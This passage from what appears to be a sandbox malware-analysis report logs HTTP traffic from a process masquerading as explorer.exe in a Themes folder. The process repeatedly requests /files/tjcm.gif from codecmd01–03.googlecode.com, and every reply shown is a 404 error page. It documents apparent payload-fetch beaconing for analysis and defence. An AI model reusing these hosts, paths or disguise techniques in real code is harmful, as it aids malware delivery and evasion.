                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:38.267365932 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      86192.168.2.549800108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:38.660322905 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:39.365655899 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:39 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:39.365731955 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      87192.168.2.54980174.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:39.810811043 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:40.497724056 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:40 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:40.497802019 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      88192.168.2.549802108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:40.946285963 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:41.608738899 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:41 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:41.608814001 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      89192.168.2.549803108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:41.964811087 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:42.748292923 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:42 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:42.748313904 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      90192.168.2.54980474.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:43.275340080 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:43.964678049 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:43 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:43.964704037 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      91192.168.2.549805108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:44.384370089 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:45.051637888 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:44 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:45.052001953 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      92192.168.2.549806108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:45.462243080 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:46.151443005 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:46 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
